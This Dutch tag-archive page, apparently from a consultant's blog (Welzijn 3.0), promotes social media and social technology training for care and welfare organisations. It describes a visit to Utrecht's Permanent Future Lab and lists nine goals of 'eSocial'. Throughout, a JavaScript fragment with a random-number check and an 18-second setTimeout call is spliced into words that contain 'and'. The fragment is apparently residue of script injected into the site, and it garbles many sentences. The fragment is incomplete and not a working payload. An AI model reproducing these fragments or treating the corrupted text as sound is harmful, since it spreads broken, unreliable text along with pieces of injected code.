Tag archieven: digitale

Wat levert het op?

Sociaal maatschappelijke organisaties inspireren en stimuleren om de kansen van sociale media / sociale technologie en digitale vaardigheid te pakken. Ik help graag bij het accepteren, innoveren en implementeren. Social media opleiding in zorg en welzijn, trainer, workshops en nascholing, coach, adviseur, blogs, columns, spreker en straks een boek (!).

Welke kansen zijn er dan te pakken? Wat levert het je op?
* Digitaal bouwen aan duurzame relaties met je deelnemers / cliënten.
* Het goede imago van je dienstverlening onder inwoners ook online voortzetten.
* Raadsleden betrekken bij je dagelijkse werk.
* Jullie herkenbaarheid in de samenleving vergroten.
* Rechtstreekse lijntjes met de wethouder en beleidsambtenaren leggen.
* Ketenpartners in de wijken vinden en binden.
* Bevorderen van mond op mond reclame, maar dan via social media.
* Tijd besparen door 1 super leuk bericht te plaatsen inplaats van 1001 foldertjes in de bus te doen.
* Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaard informatie digitaal aanbieden om tijd te besparen en je klant beter te helpen.

Mijn klanten vinden het een groot pluspunt dat ik “uit het wereldje zelf kom.” Ik spreek de taal van de sector en ken de mores. Ik help je om digitale middelen zoals social media te borgen in je dagelijkse werk, zodat het bijdraagt om jouw werkdoelen te behalen t.b.v. je cliënt / bewoner / doelgroep. Met Welzijn 3.0 help ik jou en je collega’s graag verder.

Welzijn 3.0 is geaccrediteerd door Registerplein.nl en CRKBO (Centraal Register Kort Beroepsonderwijs). KvK nummer: 52059855. Ik sta als sociaal werker geregistreerd bij Registerplein. Beschikbaar voor korte en langere opdrachten.

Ik ben Hans Versteegh. Ik heb ruim 25 jaar lang ervaring in de uitvoering binnen het sociaal domein. Waarvan veel jaren als opbouwwerker, een prachtig vak. Nog steeds val ik af en toe in en sta ik als sociaal werker geregistreerd bij Registerplein. Op de werkvloer ontdekte ik de kansen van digitalisering voor dit bijzondere veld. En tegelijk kwam ik allerlei drempels en overtuigingen tegen die deze innovatieve ontwikkeling tegenhouden.

Vinden jij en je collega’s dat spannend? Dat snap ik. Zouden jullie daar hulp bij willen hebben? Om digitale middelen zoals social media te borgen in je dagelijkse werk, zodat het helpt om jouw werkdoelen te behalen t.b.v. je cliënt / bewoner / doelgroep? Met Welzijn 3.0 help ik jou en je collega’s graag verder.

 

Sociale technologie is “Super cool!”

Dat was de reactie van mijn oudste dochter van 8 op wat er allemaal te zien en uit te proberen (!) is in het Permanent Future Lab in Utrecht. Maar hoe kwamen we daar verzeild?

MOVISIE organiseerde op 18 februari 2016 een -gratis- inspiratiemiddag rondom sociale technologie. Met verschillende interessante workshops waaronder een over de
nieuwste technologische snufjes. Met enthousiasme verzorgd door Jethro Hardeman en Evelyn Visschedijk .

Robot 1 en 2 Permanent Future Lab

Kleine robot vangt een grote

In een razend tempo kwamen aan de ordeKahoot waarmee je gaming in je lessituatie haalt, vertaal-apps voor communicatie met vluchtelingen, de vraag van de klant letterlijk in kaart brengen met heatmaps, het platform voor jongeren met eetstoornissen Proud2beme, de Muse; een mindfulness
sensor om mee te mediteren, de nieuwste virtual reality bril van HTC, leren met angsten om te gaan met Mindlight, stress meten aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van je huid met een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and”>wearable om je pols, communiceren via oplichtende en trillende stenen, en je eigen hulpverlener in Amsterdam vergelijken en uitkiezen. En om dit technologische geweld allemaal meteen maar weer te relativeren lieten ze dit komische filmpje zien.

De organisatoren van deze inspiratiemiddag vroegen de deelnemers hun belangrijkste inzicht te delen. Mij inzicht was dat mijn twee dochters van 4 en 8 niet lang zullen hoeven te wachten voor al deze technologie gangbaar, sociaal toepasbaar en geaccepteerd zal zijn.

3D printen Permanent Future lab

Met onze neus bovenop 3D-printen

De dingen die werden getoond zijn nu in ontwikkeling of zijn al op de markt. Mijn oudste wil bijvoorbeeld al een hoverboard en verzint terloops in de keuken, terwijl ik sta te koken, een vuilnisbak die van kleur verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderd zodra die vol is.

Dus het werd tijd dat deze spruit eens goed ondergedompeld werd in die steeds maar verder ontwikkelende wereld. En natuurlijk vind papa dat zelf ook bere-interessant!

Robot 3 Permanent Future Lab

Een aaibaar klein robotje

Op naar het Permanent Future Lab (video) in Utrecht dus.

Nooit van gehoord? Kan kloppen, het zit een beetje verstopt. Vlak bij Utrecht Centraal Station, inwonend bij Seats2meet. Ook nooit geweest? Oh, dat is zo’n plek waar je met je laptop crashed en cocreëert met al die andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere likeminded peoples die hun ding doen maar dat ook best willen delen om samen de wereld weer iets mooier te maken. Ik zit er zelf ook wel eens te werken.

Permanent Future Lab (artikel) is een van de drie plekken in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and waar iedereen mag spelen met robots, sensoren, virtual reality brillen en 3D-priners. Een walhalla voor mijn dochter, die eerst wat aarzelend was maar al heel snel de smaak te pakken kreeg. Ze probeerde van alles uit, daarbij aangemoedigd door de super vriendelijke mensen van het lab, die ook niet te beroerd waren om alles uit te leggen.

Virtual reality box Permanent Future Lab

Super cool! Voor het eerst virtual reality ervaren.

En ook ik vond mijzelf terug, zwevend als astronaut op een ruimtewandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling, terwijl vlak achter de enorme aardbol net de zon opkwam. Ik zag dat Europa nog in de nacht lag, met de lampjes van de grote steden duidelijk zichtbaar. Zo prachtig dat ik een selfie maakte. Natuurlijk niet echt. Maar virtueel reëel.

 

 

En dat is dan meteen het enige nadeel van dit bezoekje. Dochter wil nu natuurlijk ook een virtual reality bril, maar ik aarzel nog om daar 800 dollar op stuk te slaan. Gelukkig zijn ze er ook vanaf net geen 20 euro … van karton.

De 9 doelen van sociale technologie / eSocial

Inschrijven nieuwsbrief

 

In het sociale domein wordt “sociale technologie” of “eSocial” steeds belangrijker; het toepassen van (online) technieken om maatschappelijke doelen te helpen bereiken. Daarmee gaat het maatschappelijke veld mee in de ontwikkeling van de zich digitaliserende netwerksamenleving. 

 

Vaak worden social media daarvoor als ingang genomen. Wellicht mede omdat dit het meest aansluit bij wat werkers in hun prive leven zelf al vaak toepassen. Sociale media zijn relatief eenvoudig op te starten en wie dat doet ervaart redelijk snel positief resultaat (reacties en interactie , uitbreidende netwerken, toegang tot kennis en sleutelposities, etc).Vanuit die ervaring wordt dan de vraag gesteld; “Moeten wij ook als organisatie niet “iets” met social media gaan doen?” 

 

Hieronder vind je een opsomming van doelen die daarbij gesteld worden. Van twee kanten benaderd.

 

Ten eerste de meest voorkomende benadering, sociale technologie toegepast vanuit organisatiebelangen. Maatschappelijke organisaties zoals o.a. in zorg en welzijn staan onder druk door de transitie en bezuinigingen, om waar voor hun geld te leveren en dat zichtbaar te maken. Profileren kan van levensbelang zijn.

 

Ten tweede de minder voorkomende aanvliegroute. Vanuit belangen van doelgroepen (van zorg en welzijn) gedacht. Deze benadering komt vooralsnog veel minder vaak voor. Maar sluit wel inhoudelijk goed aan op de dagelijkse praktijk van uitvoerende werkers in dit domein. Hier invulling aan geven is van wezenlijk belang, willen maatschappelijke organisaties werkelijk met droge ogen kunnen beweren dat hun doelgroepen mede dankzij hun inzet als volwaardige burgers meedoen in de partcipatie-maatschappij.

 

A. Vanuit organisatiebelang gedacht

 

1. Doelgroep
De doelgroep bereiken
Vindplaatsen: dichtbij bekende doelgroepen staan, als vanzelfsprekend onderdeel van hun leefwereld
Voelsprieten: online te weten komen waar en waarover mensen in problemen zitten via social media monitoring
Andere doelgroepen dan gewoonlijk bereiken, nieuwe afzetgebieden aanboren
Met name de 80% inwoners bereiken die iets voor de 15% in een achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andspositie kan betekenen
Door mogelijkheden van mensen in een kansarme positie zichtbaar te maken en te benadrukken naar 80% kansrijken
Meer contacten in de samenleving / het werkgebied / de wijken krijgen

 

2. Zichtbaarheid
Laten zien wat er al gedaan wordt
Iedere medewerker communiceert zelf over zijn / haar werk
Blijf dicht bij jezelf, wat maak jij mee en waar word jij blij van?
De werkzaamheden bekend maken onder een breder publiek
Niet afwachten tot een vraag naar je toekomt maar actief laten zien wat je waarde is
Een groter bereik onder inwoners bewerkstelligen
De naam van de organisatie steviger vestigen onder inwoners en samenwerkingspartners

 

3. Meegaan
Profileren als een moderne organisatie
Meegaan met de beweging die doelgroepen en stakeholders maken
Onderdeel uit maken van de netwerksamenleving / participatiesamenleving
Verbindende rol in de samenleving ook online oppakken, community building

 

4. Einddoel
Bij iedere inwoner in de broekzak zitten

 

B. Vanuit het belang van doelgroepen gedacht

 

5. Mediawijsheid / digivaardigheid / digitale zelfredzaamheid
Accepteren dat niet iedereen zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig mee komt in de digitale maatschappij
De 15% kansarmere helpen participeren in een digitaliserende samenleving
Oog hebben voor digitale achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden als onderdeel van multi-probleem situaties
Kennis van de digitaal geworden sociale kaart
Kennis van de valkuilen van digitale communicatie (wat is wel OK en wat niet)
Vaardigheden om binnen die sociale kaart je doelgroep zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig te leren de weg te vinden
Vaardigheden om per maatschappelijke instantie de verregaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and gedigitaliseerde diensten af te nemen
Eigen kracht en zelfredzaamheid bevorderen door digitale vaardigheden bij te brengen

 

6. Overbruggen van de digitale kloof
Verkleinen van de afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tot de 80% die wel zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig functioneert met behulp van internet.
Moedeloosheid (ik kan het allemaal niet bijhouden) wegnemen
Helpen overzicht te krijgen op eigen situatie
Leren inzien dat de computer kunnen bedienen er in deze tijd bij hoort

 

7. Ondersteuning
De deeleconomie biedt praktische hulp, gratis of voor een wederdienst, via digitale kanalen zoals sociale media en speciale platformen
Ruilen of zelfs weggeven van diensten en goederen via online platforms
 • Goederen zoals kleding, schoenen
 • Eten
 • Woningen
 • Auto’s
 • Kennis bijvoorbeeld over moestuinen
 • Gezelschap
 • Oppas
 • Ontmoeting
 • Liefde, partner vinden

 

8. Thema’s
 • Vergrijzing:              hulp en zorg organiseren
 • Armoede:                de weg weten te vinden naar gratis diensten en goederen
 • Sociaal isolement:  betekenisvol contact met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen aangaan
 • Ontmoeting:           gelijkgestemden vinden
 • Community:            deel uitmaken van een groter geheel, meedoen, er bij horen
 •  Zorgnetwerken:     er niet alleen voor staan, informele hulpverlening, eigen kracht

 

9. Toegang
Praktische ondersteuning bieden, er naast zitten
Kleinschalige digitale oefenplekken in wijken
Opstapplaatsen om met lokale overheden (eParticipatie) en maatschappelijke instanties in contact te treden om zorg te regelen en te ontvangen
Digitaal vaardige Hulpverleners en vrijwilligers, die weten hoe je online kunt verbinden en activeren (opbouwwerk-methodieken)
Leren bedienen van apparatuur als tablets, smartphones en laptops
Leren hoe een abonnement op ADSL, Wifi en G4 afgesloten wordt
Leren bedienen van social media platformen

 

Workshops
Deze maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and geef ik de eerste workshops binnen welzijnsorganisaties waarin deze twee verschillende benaderingen centraal staan.
Meer informatie is bij mij te verkrijgen.
Neem contact op via  h.versteegh@welzijn30.nl
Of bel mij op 06-44062029.

 

Hans Versteegh
Welzijn 3.0